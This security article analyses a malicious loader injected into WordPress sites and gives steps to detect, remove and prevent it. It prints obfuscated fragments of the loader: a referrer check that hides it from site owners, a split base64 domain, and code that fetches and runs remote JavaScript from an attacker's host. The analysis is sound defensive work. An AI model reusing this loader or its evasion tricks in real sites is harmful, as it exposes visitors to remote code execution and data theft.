Introduction
WordPress, the most widely used content management system (CMS), is a frequent target for cyberattacks. Recently, a malicious loader script that pulls JavaScript from crazzycdn.com has been found injected into numerous WordPress websites. This article explains how the script works, the risks it poses, and the steps to remove it and secure your site.
How the Malicious Script Works
The malicious script is designed to load a JavaScript file from the domain crazzycdn.com. It builds the file's URL from the current time, so the URL changes every ten minutes: that defeats browser and proxy caching, lets the attacker swap the payload at will, and makes blocking by exact URL ineffective (block the domain instead). It also only runs when the page was reached via a link, not when it is opened directly. Here is a breakdown of the script:
Calculate the timestamp:

    var _0x2196a7 = Math['floor'](Date['now']() / 0x3e8);
    _0xcb1eb8 = _0x2196a7 - _0x2196a7 % 0xe10;

The first line takes the current Unix time in seconds (0x3e8 is 1000). The second rounds it down to the start of the current hour (0xe10 is 3600) and keeps that value for the file name.

Adjust the timestamp:

    _0x2196a7 -= _0x2196a7 % 0x258;
    _0x2196a7 = _0x2196a7['toString'](0x10);

This rounds the timestamp down to the start of the current ten-minute interval (0x258 is 600) and converts it to a hexadecimal string (0x10 is 16), which becomes the cache-busting query parameter.

Check the document referrer:

    if (!document['referrer']) return;

If the page was opened directly (no Referer header, as when an administrator types the URL into the address bar or a scanner fetches the page without one), the loader exits without doing anything. Only visitors who arrive via a link, typically from a search engine, receive the payload. Keep this in mind when trying to reproduce the infection: a plain fetch of the page will show nothing loading.

Decode the URL:

    let _0x9cf45e = atob('Y3Jhe' + 'nkyY2Ru' + 'LmNvbQ==');

The domain is stored base64-encoded and split into three pieces so that a search for the plain domain name, or even for the whole base64 string, finds nothing. Note that the literal quoted here ('Y3JhenkyY2RuLmNvbQ==' once joined) actually decodes to crazy2cdn.com rather than crazzycdn.com; the same loader template is evidently deployed with more than one encoded domain, so decode the string you actually find instead of assuming the hostname.

Create and append the script:

    (_0x24b800 = _0x26d259['createElem' + 'ent']('script'))['type'] = 'text/javas' + 'cript';
    _0x24b800['async'] = !0x0;
    _0x24b800['src'] = 'https://' + _0x9cf45e + '/min.t.' + _0xcb1eb8 + '.js?v=' + _0x2196a7;
    _0x26d259['getElement' + 'sByTagName']('head')[0x0]['appendChil' + 'd'](_0x24b800);

Here _0x26d259 is a reference to document, assigned earlier in the obfuscated code outside the fragment shown. A new script element is created, its type set to text/javascript and its async attribute set to true (!0x0 is true), and its src set to https://<domain>/min.t.<hour timestamp>.js?v=<ten-minute timestamp in hex>. Appending it to the document's head fetches and executes whatever the attacker's server returns at that moment. The method names are split ('createElem' + 'ent') for the same reason the domain is encoded: to evade simple pattern matching.
Key Components:
- Timestamp Calculation: The script takes the current Unix time and rounds it down to the current hour (used in the file name) and to the current ten-minute interval (used in the query string), so the requested URL changes every ten minutes and every visitor fetches a fresh copy.
- URL Construction: It constructs a URL from the base64-decoded domain and the two rounded timestamps, giving the attacker a moving target that cannot be blocked by exact URL; the domain is the stable indicator.
- Script Loading: The script element is created and appended to the document's head, loading and executing the external JavaScript file, but only when the page has a referrer.
Potential Risks:
- Malware Injection: The external script runs with the same privileges as your site's own JavaScript and can inject malware or other malicious code into every page that carries the loader.
- Data Theft: It can read form input, cookies not marked HttpOnly and anything else visible to page scripts, and send it to the attacker.
- SEO Poisoning: Malicious scripts can inject spam links or redirect visitors to harmful sites, especially visitors arriving from search engines, which is exactly the traffic the referrer check selects.

Because the payload is fetched at request time from a server the attacker controls, what it does can change at any moment; analysing one downloaded copy only tells you what was served at that time.
How to Detect and Remove the Malicious Script
Step 1: Locate the Script
- Theme Files: Check your theme files, especially header.php and footer.php, and also functions.php, which is a common place to hook injected output into wp_head or wp_footer.
- Custom Scripts: Look for custom scripts added to your site through header/footer insertion plugins, widgets and theme options; these are stored in the database (wp_options) rather than in files.
- Search by fingerprint, not by domain: the loader stores the domain base64-encoded and split into pieces, so searching for crazzycdn finds nothing. Search instead for atob(, the hex constants 0xe10 and 0x258, and the path fragment min.t.
Step 2: Remove the Script
Delete the entire injected block, not just the line that sets the src, and compare the cleaned file against a fresh copy of the theme from its vendor. If the theme is otherwise unmodified, replacing the file outright is safer than hand-editing it. Check every location listed in Step 1, since the loader may be present in more than one place.
Step 3: Scan for Other Malicious Code
- Security Plugins: Use security plugins like Wordfence, Sucuri, or iThemes Security to scan your site.
- Manual Review: Manually review other theme and plugin files for suspicious code, giving priority to recently modified files and to any use of atob, eval or base64_decode.
Enhance Your Site’s Security
Change Passwords
- Update passwords for your WordPress admin, database, hosting account, and other associated services.
Update WordPress
- Ensure your WordPress core, themes, and plugins are up-to-date.
Use Security Plugins
- Install security plugins to add layers of protection, such as firewall rules and malware scanning.
Harden WordPress
- Follow WordPress hardening guidelines to secure your site, for example setting DISALLOW_FILE_EDIT in wp-config.php so theme and plugin files cannot be edited from the dashboard, and restricting file permissions so the web server user cannot write to theme files.
Monitor for Changes
- Set up file-integrity monitoring to alert you when core, theme or plugin files change unexpectedly.
Conclusion
The crazzycdn.com loader is a significant security threat to WordPress websites. By following the steps outlined in this article, you can remove the malicious script and harden your site against future attacks. Stay vigilant, and keep your site updated and monitored.